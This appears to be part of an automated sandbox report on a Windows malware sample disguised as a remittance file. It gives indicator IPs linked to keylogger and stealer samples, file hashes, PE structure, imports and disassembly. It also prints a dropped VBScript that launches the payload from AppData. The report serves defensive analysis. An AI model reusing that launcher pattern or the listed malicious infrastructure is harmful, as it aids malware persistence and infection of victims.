                                                                    rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    Or3dzp4vB1.exeGet hashmaliciousXWormBrowse
                                                                    • 149.154.167.220
                                                                    z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    rdoc17000320240923070456.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeGet hashmaliciousXWormBrowse
                                                                    • 149.154.167.220
                                                                    CLOUDFLARENETUSrLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    update.ps1Get hashmaliciousNetSupport RAT, HTMLPhisherBrowse
                                                                    • 104.21.73.126
                                                                    https://1drv.ms/o/s!AnrtiNmLLRZglVBmj_pzjvzIvHZ7?e=WnZeS1Get hashmaliciousHtmlDropperBrowse
                                                                    • 104.18.94.41
                                                                    hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                                                    • 188.114.97.3
                                                                    1e#U0414.exeGet hashmaliciousLokibotBrowse
                                                                    • 188.114.96.3
                                                                    wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                    • 188.114.96.3
                                                                    Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    http://mir-belting.comGet hashmaliciousUnknownBrowse
                                                                    • 162.159.140.229
                                                                    https://empshentel.com/share/sharefile/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 172.67.177.128
                                                                    PUBLIC-DOMAIN-REGISTRYUSz9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.199.223
                                                                    http://www.tri-star.in/mn/onedrive.htmlGet hashmaliciousUnknownBrowse
                                                                    • 208.91.198.225
                                                                    PAYSLIP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.199.224
                                                                    SWIFT COPY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.199.224
                                                                    SecuriteInfo.com.Win32.RATX-gen.3768.11045.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.199.223
                                                                    Payment Receipt for 30% Advance PI.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 103.21.58.10
                                                                    PO-000001488.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 199.79.62.115
                                                                    UPDATED FLOOR PLAN_3D.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.199.223
                                                                    https://www.cognitoforms.com/f/91H-aU-zmECx5kHQVFHicA/1Get hashmaliciousHTMLPhisherBrowse
                                                                    • 119.18.58.80
                                                                    New Order PO#86637.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.199.223
                                                                    ORACLE-BMC-31898USFAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                    • 193.122.6.168
                                                                    rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 193.122.6.168
                                                                    rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                    • 193.122.6.168
                                                                    rcontractorder.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 193.122.6.168
                                                                    rdoc17000320240923070456.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 193.122.6.168
                                                                    rPEDIDO-M456.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 193.122.130.0
                                                                    SKMBT_C22024082310420.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 193.122.6.168
                                                                    Pedido de GmbH.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    TT copy for SO-2409-032.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    invoice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    54328bd36c14bd82ddaa0c04b25ed9adrLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    rPROFORMAINVOICE-PO_ATS_1036pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    t1RVQb98yT.exeGet hashmaliciousS400 RATBrowse
                                                                    • 188.114.97.3
                                                                    9Jvb8f4R5m.exeGet hashmaliciousS400 RATBrowse
                                                                    • 188.114.97.3
                                                                    3b5074b1b5d032e5620f69f9f700ff0erLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    update.ps1Get hashmaliciousNetSupport RAT, HTMLPhisherBrowse
                                                                    • 149.154.167.220
                                                                    https://1drv.ms/o/s!AnrtiNmLLRZglVBmj_pzjvzIvHZ7?e=WnZeS1Get hashmaliciousHtmlDropperBrowse
                                                                    • 149.154.167.220
                                                                    https://texicoschools-my.sharepoint.com/:f:/p/bhadley/EsaMKJ-X61dEm1tZEaws2DMBSjLuzfhGBl4pu2aaho1XiQ?e=fJogeVGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                                                    • 149.154.167.220
                                                                    wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                    • 149.154.167.220
                                                                    Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    http://mir-belting.comGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • 149.154.167.220
                                                                    test.batGet hashmaliciousMicroClipBrowse
                                                                    • 149.154.167.220
                                                                    No context
                                                                    Process:C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):274432
                                                                    Entropy (8bit):6.978000929733236
                                                                    Encrypted:false
                                                                    SSDEEP:3072:uMT+kXbpbSzLSYiA5mFpd6Z/0ztcSP9dSPb4xRBOPlrY1iH1M86g:FT+kXbpbSzLSYi7FPK/UZ4b4xR8vHiTg
                                                                    MD5:E94A651905DDD299B4A1E8AB298BC126
                                                                    SHA1:B8102BBEBE368473200BB4DA2247C9FC50FB8D13
                                                                    SHA-256:1ACA42643DC434AFF3BCABC504FC45CE3ABA0BF560D34156C929F847B858A397
                                                                    SHA-512:FDE41734FD4F3500633CE4A07A337DB5FE4AAB8693D96B986D66CD7E3B4BA0E6D92130347EEE30338CA6DAFA22F35CCDD4D1B889C5BDE9DF54A8093FF71988CC
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:.b.NB0E3P8M0..1U.I4NF8LN.0E3T8M0YP1UJI4NF8LNA0E3T8M0YP1UJI4N.8LNO/.=T.D.x.0..h`&/Kl>3_"A5UmS8>_:>iV+fJ9 aY+..w..4?U0dD9Db8LNA0E3.}M0.Q2U..(F8LNA0E3.8O1RQaUJS0NF,LNA0E3Z.I0Yp1UJ.0NF8.NA.E3T:M0]P1UJI4NB8LNA0E3T.I0YR1UJI4ND8..A0U3T(M0YP!UJY4NF8LNQ0E3T8M0YP1U.q0N.8LNApA3C(M0YP1UJI4NF8LNA0E3TXI0UP1UJI4NF8LNA0E3T8M0YP1UJI4NF8LNA0E3T8M0YP1UJI4NF8LNA.E3\8M0YP1UJI4NN.LN.0E3T8M0YP1Ud=Q628LNU)A3T.M0YJ5UJK4NF8LNA0E3T8M0yP15d;G<%8LNV E3TxI0YB1UJU0NF8LNA0E3T8M0.P1.d;Q")[LNM0E3TXI0YR1UJg0NF8LNA0E3T8M0.P1.JI4NF8LNA0E3T8M0.h5UJI4N.8LNC0@3<.O0..0UII4N.8LH.G3.8M0YP1UJI4NF8LNA0E3T8M0YP1UJI4NF8LNA0E3T8M0.-.Z...'5..NA0E3T9O3]V9]JI4NF8LN?0E3.8M0.P1U}I4Nc8LN,0E3p8M0'P1U4I4N"8LN30E358M0.P1U%I4N(8LN?0E3J:e.YP;.lI6fg8LDA..@v8M:.Q1UN:.NF2.LA0A@p8M:.S1UN:.NF2.JA0A@r8M:.U1UNcnNE.ZHA0^\m8M:YS.@LI4Ul.LLi.E3^8g.YS.@LI4Ul.LL.9E3P..CDP1Sb.4NLLENA2.9T8I.GR..JI>ddFGNA4n3~.3<YP5~Jc.0K8LJj0o-V.@0YT.w4G4NB.LdcNJ3T<f0sN3.EI4Jl.2^A0A.T.oNHP1QaI.l8*LNE.E.vF^0YT.U`kJZF8HeA.gMA8M4rP.w4_4NB.LdcNR3T<f0srOMJI0eF.RL.(E3P.K.;PC_\IDM
                                                                    Process:C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1275767
                                                                    Entropy (8bit):7.397264637586639
                                                                    Encrypted:false
                                                                    SSDEEP:24576:pRmJkcoQricOIQxiZY1iaJ+QdSbdZwy1mynIMrNdUtl85Pf:mJZoQrbTFZY1iaJB0zDIME6
                                                                    MD5:34280E3A145D8D865EFEDF422B568E46
                                                                    SHA1:D5E2B2072A08A672D87446DF36E513095945D151
                                                                    SHA-256:4FFAD08E9B831394159944B7C719BD9A80EFCDE000EBFA788DE1A23F64007B91
                                                                    SHA-512:20C33FC3B8AB2F6988BB8B149E625BAAD6D442B6E278AB0AF1F4FE793272CCDF2803AF503CF1E1E3CCD1DA8503EDFCF8D26745E685518D4B40023FB9C1DFA284
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T.......x7........................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc...x7.......8...T..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\directory\name.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):270
                                                                    Entropy (8bit):3.4297698362729916
                                                                    Encrypted:false
                                                                    SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlzQ1A1z4mA2n
                                                                    MD5:3DA73F5D6073C0D8F7B9CEE8DF5035A7
                                                                    SHA1:D4B44315FD7C6171A9CC03899A00E593AE78CDE7
                                                                    SHA-256:1F2D7E91D96B7DA16BC230D9C519E5E0A6A78FCD6B3468E590D5A97239BB420B
                                                                    SHA-512:CE2041AA9AAFE863C44296E4ED58BA207E4849584AB057B93354F10679DC1BFAE50241EEDAD74DCC4D7AF6C8ADC3A97E4581F56E5E71955651D52BA866ED763B
                                                                    Malicious:true
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.397264637586639
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:z84TTREMITTANCEUSD347_432_63.exe
                                                                    File size:1'275'767 bytes
                                                                    MD5:34280e3a145d8d865efedf422b568e46
                                                                    SHA1:d5e2b2072a08a672d87446df36e513095945d151
                                                                    SHA256:4ffad08e9b831394159944b7c719bd9a80efcde000ebfa788de1a23f64007b91
                                                                    SHA512:20c33fc3b8ab2f6988bb8b149e625baad6d442b6e278ab0af1f4fe793272ccdf2803af503cf1e1e3ccd1da8503edfcf8d26745e685518d4b40023fb9c1dfa284
                                                                    SSDEEP:24576:pRmJkcoQricOIQxiZY1iaJ+QdSbdZwy1mynIMrNdUtl85Pf:mJZoQrbTFZY1iaJB0zDIME6
                                                                    TLSH:8645DF21B5D240E5D1E22EB25D79F355BA6A6D260222819FE3C839F10E73380D7297F7
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                    Icon Hash:cf818c848c8a814f
                                                                    Entrypoint:0x4165c1
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:0
                                                                    File Version Major:5
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                    Instruction
                                                                    call 00007F59186F28FBh
                                                                    jmp 00007F59186E976Eh
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push edi
                                                                    push esi
                                                                    mov esi, dword ptr [ebp+0Ch]
                                                                    mov ecx, dword ptr [ebp+10h]
                                                                    mov edi, dword ptr [ebp+08h]
                                                                    mov eax, ecx
                                                                    mov edx, ecx
                                                                    add eax, esi
                                                                    cmp edi, esi
                                                                    jbe 00007F59186E98EAh
                                                                    cmp edi, eax
                                                                    jc 00007F59186E9A86h
                                                                    cmp ecx, 00000080h
                                                                    jc 00007F59186E98FEh
                                                                    cmp dword ptr [004A9724h], 00000000h
                                                                    je 00007F59186E98F5h
                                                                    push edi
                                                                    push esi
                                                                    and edi, 0Fh
                                                                    and esi, 0Fh
                                                                    cmp edi, esi
                                                                    pop esi
                                                                    pop edi
                                                                    jne 00007F59186E98E7h
                                                                    jmp 00007F59186E9CC2h
                                                                    test edi, 00000003h
                                                                    jne 00007F59186E98F6h
                                                                    shr ecx, 02h
                                                                    and edx, 03h
                                                                    cmp ecx, 08h
                                                                    jc 00007F59186E990Bh
                                                                    rep movsd
                                                                    jmp dword ptr [00416740h+edx*4]
                                                                    mov eax, edi
                                                                    mov edx, 00000003h
                                                                    sub ecx, 04h
                                                                    jc 00007F59186E98EEh
                                                                    and eax, 03h
                                                                    add ecx, eax
                                                                    jmp dword ptr [00416654h+eax*4]
                                                                    jmp dword ptr [00416750h+ecx*4]
                                                                    nop
                                                                    jmp dword ptr [004166D4h+ecx*4]
                                                                    nop
                                                                    inc cx
                                                                    add byte ptr [eax-4BFFBE9Ah], dl
                                                                    inc cx
                                                                    add byte ptr [ebx], ah
                                                                    ror dword ptr [edx-75F877FAh], 1
                                                                    inc esi
                                                                    add dword ptr [eax+468A0147h], ecx
                                                                    add al, cl
                                                                    jmp 00007F591AB620E7h
                                                                    add esi, 03h
                                                                    add edi, 03h
                                                                    cmp ecx, 08h
                                                                    jc 00007F59186E98AEh
                                                                    rep movsd
                                                                    jmp dword ptr [00000000h+edx*4]
                                                                    Programming Language:
                                                                    • [ C ] VS2010 SP1 build 40219
                                                                    • [C++] VS2010 SP1 build 40219
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [ASM] VS2010 SP1 build 40219
                                                                    • [RES] VS2010 SP1 build 40219
                                                                    • [LNK] VS2010 SP1 build 40219
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x13778.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0xab0000x137780x13800deaf8cf0ab1ab56c5b616d6567464a39False0.08774038461538461data3.8891256142087705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0xab4480x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                    RT_ICON0xab5700x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                    RT_ICON0xab6980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                    RT_ICON0xab7c00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.05220040222406246
                                                                    RT_MENU0xbbfe80x50dataEnglishGreat Britain0.9
                                                                    RT_DIALOG0xbc0380xfcdataEnglishGreat Britain0.6507936507936508
                                                                    RT_STRING0xbc1380x530dataEnglishGreat Britain0.33960843373493976
                                                                    RT_STRING0xbc6680x690dataEnglishGreat Britain0.26964285714285713
                                                                    RT_STRING0xbccf80x4d0dataEnglishGreat Britain0.36363636363636365
                                                                    RT_STRING0xbd1c80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                    RT_STRING0xbd7c80x65cdataEnglishGreat Britain0.34336609336609336
                                                                    RT_STRING0xbde280x388dataEnglishGreat Britain0.377212389380531
                                                                    RT_STRING0xbe1b00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                    RT_GROUP_ICON0xbe3080x14dataEnglishGreat Britain1.25
                                                                    RT_GROUP_ICON0xbe3200x14dataEnglishGreat Britain1.15
                                                                    RT_GROUP_ICON0xbe3380x14dataEnglishGreat Britain1.25
                                                                    RT_GROUP_ICON0xbe3500x14dataEnglishGreat Britain1.25
                                                                    RT_VERSION0xbe3680x19cdataEnglishGreat Britain0.5339805825242718
                                                                    RT_MANIFEST0xbe5080x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                    DLLImport
                                                                    WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                    VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                    COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                    MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                    PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                    USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                    KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                    USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                    GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
